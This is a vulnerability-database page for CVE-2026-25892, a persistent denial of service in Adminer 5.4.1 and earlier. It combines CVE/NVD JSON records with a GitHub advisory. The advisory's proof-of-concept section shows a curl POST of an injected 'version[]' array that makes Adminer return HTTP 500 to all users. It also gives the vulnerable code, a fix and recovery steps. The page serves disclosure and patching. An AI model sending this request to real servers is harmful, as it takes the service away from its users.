Vulnerability-Lookup

CVE-2026-25892 (GCVE-0-2026-25892)

Vulnerability from cvelistv5 – Published: 2026-02-09 21:26 – Updated: 2026-02-10 15:57

Title

Adminer has an Unauthenticated Persistent DoS via Array Injection in ?script=version Endpoint

Summary

Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST version[] parameter which PHP converts to an array. On next page load, openssl_verify() receives this array instead of string and throws TypeError, returning HTTP 500 to all users. Upgrade to Adminer 5.4.2.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-20 - Improper Input Validation

Assigner

GitHub_M

References

URL

Tags

	https://github.com/vrana/adminer/security/advisor…	x_refsource_CONFIRM
	https://github.com/vrana/adminer/commit/21d3a3150…	x_refsource_MISC
	https://github.com/vrana/adminer/releases/tag/v5.4.2	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	vrana	adminer	Affected: >= 4.6.2, < 5.4.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25892",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-10T15:39:30.588522Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-10T15:57:46.865Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "adminer",
          "vendor": "vrana",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 4.6.2, \u003c 5.4.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST version[] parameter which PHP converts to an array. On next page load, openssl_verify() receives this array instead of string and throws TypeError, returning HTTP 500 to all users. Upgrade to Adminer 5.4.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20: Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-09T21:26:45.224Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/vrana/adminer/security/advisories/GHSA-q4f2-39gr-45jh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/vrana/adminer/security/advisories/GHSA-q4f2-39gr-45jh"
        },
        {
          "name": "https://github.com/vrana/adminer/commit/21d3a3150388677b18647d68aec93b7850e457d3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vrana/adminer/commit/21d3a3150388677b18647d68aec93b7850e457d3"
        },
        {
          "name": "https://github.com/vrana/adminer/releases/tag/v5.4.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vrana/adminer/releases/tag/v5.4.2"
        }
      ],
      "source": {
        "advisory": "GHSA-q4f2-39gr-45jh",
        "discovery": "UNKNOWN"
      },
      "title": "Adminer has an Unauthenticated Persistent DoS via Array Injection in ?script=version Endpoint"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25892",
    "datePublished": "2026-02-09T21:26:45.224Z",
    "dateReserved": "2026-02-06T21:08:39.130Z",
    "dateUpdated": "2026-02-10T15:57:46.865Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-25892\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-09T22:16:04.023\",\"lastModified\":\"2026-02-10T15:22:54.740\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST version[] parameter which PHP converts to an array. On next page load, openssl_verify() receives this array instead of string and throws TypeError, returning HTTP 500 to all users. Upgrade to Adminer 5.4.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]}],\"references\":[{\"url\":\"https://github.com/vrana/adminer/commit/21d3a3150388677b18647d68aec93b7850e457d3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/vrana/adminer/releases/tag/v5.4.2\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/vrana/adminer/security/advisories/GHSA-q4f2-39gr-45jh\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"Adminer has an Unauthenticated Persistent DoS via Array Injection in ?script=version Endpoint\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-20\", \"lang\": \"en\", \"description\": \"CWE-20: Improper Input Validation\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"HIGH\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/vrana/adminer/security/advisories/GHSA-q4f2-39gr-45jh\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/vrana/adminer/security/advisories/GHSA-q4f2-39gr-45jh\"}, {\"name\": \"https://github.com/vrana/adminer/commit/21d3a3150388677b18647d68aec93b7850e457d3\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/vrana/adminer/commit/21d3a3150388677b18647d68aec93b7850e457d3\"}, {\"name\": \"https://github.com/vrana/adminer/releases/tag/v5.4.2\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/vrana/adminer/releases/tag/v5.4.2\"}], \"affected\": [{\"vendor\": \"vrana\", \"product\": \"adminer\", \"versions\": [{\"version\": \"\u003e= 4.6.2, \u003c 5.4.2\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-09T21:26:45.224Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST version[] parameter which PHP converts to an array. On next page load, openssl_verify() receives this array instead of string and throws TypeError, returning HTTP 500 to all users. Upgrade to Adminer 5.4.2.\"}], \"source\": {\"advisory\": \"GHSA-q4f2-39gr-45jh\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25892\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-10T15:39:30.588522Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-10T15:39:31.665Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-25892\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2026-02-06T21:08:39.130Z\", \"datePublished\": \"2026-02-09T21:26:45.224Z\", \"dateUpdated\": \"2026-02-10T15:57:46.865Z\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-25892

Vulnerability from fkie_nvd - Published: 2026-02-09 22:16 - Updated: 2026-02-10 15:22

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/vrana/adminer/commit/21d3a3150388677b18647d68aec93b7850e457d3
	security-advisories@github.com	https://github.com/vrana/adminer/releases/tag/v5.4.2
	security-advisories@github.com	https://github.com/vrana/adminer/security/advisories/GHSA-q4f2-39gr-45jh

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST version[] parameter which PHP converts to an array. On next page load, openssl_verify() receives this array instead of string and throws TypeError, returning HTTP 500 to all users. Upgrade to Adminer 5.4.2."
    }
  ],
  "id": "CVE-2026-25892",
  "lastModified": "2026-02-10T15:22:54.740",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-09T22:16:04.023",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/vrana/adminer/commit/21d3a3150388677b18647d68aec93b7850e457d3"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/vrana/adminer/releases/tag/v5.4.2"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/vrana/adminer/security/advisories/GHSA-q4f2-39gr-45jh"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-Q4F2-39GR-45JH

Vulnerability from github – Published: 2026-02-10 00:25 – Updated: 2026-02-10 02:56

Summary

Adminer has an Unauthenticated Persistent DoS via Array Injection in ?script=version Endpoint

Details

Summary

Adminer v5.4.1 has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST version[] parameter which PHP converts to an array. On next page load, openssl_verify() receives this array instead of string and throws TypeError, returning HTTP 500 to all users.

Fix

Upgrade to Adminer 5.4.2.

Mitigation (if you can't upgrade): Make file adminer.version in temp directory (usually the value of upload_tmp_dir) unwritable by web server.

Details

1. Intended design of ?script=version:

The endpoint is designed to receive version data from adminer.org via browser JavaScript: - functions.js line 102-117: Creates iframe to https://www.adminer.org/version/ - Adminer.org sends signed version data via postMessage - JavaScript POSTs this to ?script=version - Server stores in /tmp/adminer.version for signature verification

// functions.js line 117
ajax(url + 'script=version', () => { }, event.data + '&token=' + token);

2. The vulnerability:

The endpoint only checks $_GET["script"] == "version" - it does not validate: - Request origin (no CSRF token check for this endpoint) - Request source (any HTTP client can POST) - Parameter types (version expected as string, array not rejected)

// bootstrap.inc.php line 32-40
if ($_GET["script"] == "version") {
    $filename = get_temp_dir() . "/adminer.version";
    @unlink($filename);
    $fp = file_open_lock($filename);
    if ($fp) {
        file_write_unlock($fp, serialize(array("signature" => $_POST["signature"], "version" => $_POST["version"])));
    }
    exit;
}

3. Type confusion crash:

When POST contains version[] instead of version, PHP creates an array. When Adminer reads this file and passes to openssl_verify():

// design.inc.php line 75
if (openssl_verify($version["version"], base64_decode($version["signature"]), $public) == 1) {

PHP 8.x throws:

TypeError: openssl_verify(): Argument #1 ($data) must be of type string, array given

PoC

Steps to Reproduce:

Step 1: Verify Adminer is running and accessible.

curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8888/adminer-5.4.1.php

Expected output:

Step 2: Send the malicious POST request. The version[] syntax causes PHP to create an array instead of a string.

curl -X POST "http://localhost:8888/adminer-5.4.1.php?script=version" \
     -d "signature=x&version[]=INJECTED"

Expected output: Empty response (no error).

Step 3: Access Adminer again to trigger the crash.

curl -s -o /dev/null -w "%{http_code}\n" http://localhost:8888/adminer-5.4.1.php

Expected output:

Step 4: (Optional) View the PHP error in server logs.

PHP Fatal error:  Uncaught TypeError: openssl_verify(): Argument #1 ($data) must be of type string, array given in adminer-5.4.1.php:1386

Step 5: (Optional) Inspect the poisoned file.

cat /tmp/adminer.version

Expected output:

a:2:{s:9:"signature";s:1:"x";s:7:"version";a:1:{i:0;s:8:"INJECTED";}}

Recovery:

rm /tmp/adminer.version

After deletion, Adminer returns HTTP 200.

Impact

Type: Denial of Service

Root cause: The ?script=version endpoint is designed to receive data from adminer.org via JavaScript, but lacks server-side validation. Any HTTP client can POST directly to this endpoint. Combined with missing type validation before openssl_verify(), this allows persistent DoS.

Affected users: Any Adminer instance accessible over the network.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "vrana/adminer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.6.2"
            },
            {
              "fixed": "5.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25892"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-10T00:25:24Z",
    "nvd_published_at": "2026-02-09T22:16:04Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAdminer v5.4.1 has a version check mechanism where `adminer.org` sends signed version info via JavaScript postMessage, which the browser then POSTs to `?script=version`. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST `version[]` parameter which PHP converts to an array. On next page load, `openssl_verify()` receives this array instead of string and throws `TypeError`, returning HTTP 500 to all users.\n\n### Fix\n\nUpgrade to Adminer 5.4.2.\n\n**Mitigation** (if you can\u0027t upgrade): Make file `adminer.version` in temp directory (usually the value of [upload_tmp_dir](https://www.php.net/ini.core#ini.upload-tmp-dir)) unwritable by web server.\n\n### Details\n\n**1. Intended design of `?script=version`:**\n\nThe endpoint is designed to receive version data from `adminer.org` via browser JavaScript:\n- `functions.js` line 102-117: Creates iframe to `https://www.adminer.org/version/`\n- Adminer.org sends signed version data via `postMessage`\n- JavaScript POSTs this to `?script=version`\n- Server stores in `/tmp/adminer.version` for signature verification\n\n```javascript\n// functions.js line 117\najax(url + \u0027script=version\u0027, () =\u003e { }, event.data + \u0027\u0026token=\u0027 + token);\n```\n\n**2. The vulnerability:**\n\nThe endpoint only checks `$_GET[\"script\"] == \"version\"` - it does not validate:\n- Request origin (no CSRF token check for this endpoint)\n- Request source (any HTTP client can POST)\n- Parameter types (`version` expected as string, array not rejected)\n\n```php\n// bootstrap.inc.php line 32-40\nif ($_GET[\"script\"] == \"version\") {\n    $filename = get_temp_dir() . \"/adminer.version\";\n    @unlink($filename);\n    $fp = file_open_lock($filename);\n    if ($fp) {\n        file_write_unlock($fp, serialize(array(\"signature\" =\u003e $_POST[\"signature\"], \"version\" =\u003e $_POST[\"version\"])));\n    }\n    exit;\n}\n```\n\n**3. Type confusion crash:**\n\nWhen POST contains `version[]` instead of `version`, PHP creates an array. When Adminer reads this file and passes to `openssl_verify()`:\n\n```php\n// design.inc.php line 75\nif (openssl_verify($version[\"version\"], base64_decode($version[\"signature\"]), $public) == 1) {\n```\n\nPHP 8.x throws:\n```\nTypeError: openssl_verify(): Argument #1 ($data) must be of type string, array given\n```\n\n### PoC\n\n**Steps to Reproduce:**\n\n**Step 1:** Verify Adminer is running and accessible.\n```bash\ncurl -s -o /dev/null -w \"%{http_code}\\n\" http://localhost:8888/adminer-5.4.1.php\n```\nExpected output:\n```\n200\n```\n\n**Step 2:** Send the malicious POST request. The `version[]` syntax causes PHP to create an array instead of a string.\n```bash\ncurl -X POST \"http://localhost:8888/adminer-5.4.1.php?script=version\" \\\n     -d \"signature=x\u0026version[]=INJECTED\"\n```\nExpected output: Empty response (no error).\n\n**Step 3:** Access Adminer again to trigger the crash.\n```bash\ncurl -s -o /dev/null -w \"%{http_code}\\n\" http://localhost:8888/adminer-5.4.1.php\n```\nExpected output:\n```\n500\n```\n\n**Step 4:** (Optional) View the PHP error in server logs.\n```\nPHP Fatal error:  Uncaught TypeError: openssl_verify(): Argument #1 ($data) must be of type string, array given in adminer-5.4.1.php:1386\n```\n\n**Step 5:** (Optional) Inspect the poisoned file.\n```bash\ncat /tmp/adminer.version\n```\nExpected output:\n```\na:2:{s:9:\"signature\";s:1:\"x\";s:7:\"version\";a:1:{i:0;s:8:\"INJECTED\";}}\n```\n\n**Recovery:**\n```bash\nrm /tmp/adminer.version\n```\nAfter deletion, Adminer returns HTTP 200.\n\n---\n\n### Impact\n\n**Type:** Denial of Service\n\n**Root cause:** The `?script=version` endpoint is designed to receive data from `adminer.org` via JavaScript, but lacks server-side validation. Any HTTP client can POST directly to this endpoint. Combined with missing type validation before `openssl_verify()`, this allows persistent DoS.\n\n**Affected users:** Any Adminer instance accessible over the network.",
  "id": "GHSA-q4f2-39gr-45jh",
  "modified": "2026-02-10T02:56:04Z",
  "published": "2026-02-10T00:25:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vrana/adminer/security/advisories/GHSA-q4f2-39gr-45jh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25892"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vrana/adminer/commit/21d3a3150388677b18647d68aec93b7850e457d3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vrana/adminer"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vrana/adminer/releases/tag/v5.4.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Adminer has an Unauthenticated Persistent DoS via Array Injection in ?script=version Endpoint"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-25892 (GCVE-0-2026-25892)

FKIE_CVE-2026-25892

GHSA-Q4F2-39GR-45JH

Summary

Fix

Details

PoC

Impact

Tags

Sightings

Nomenclature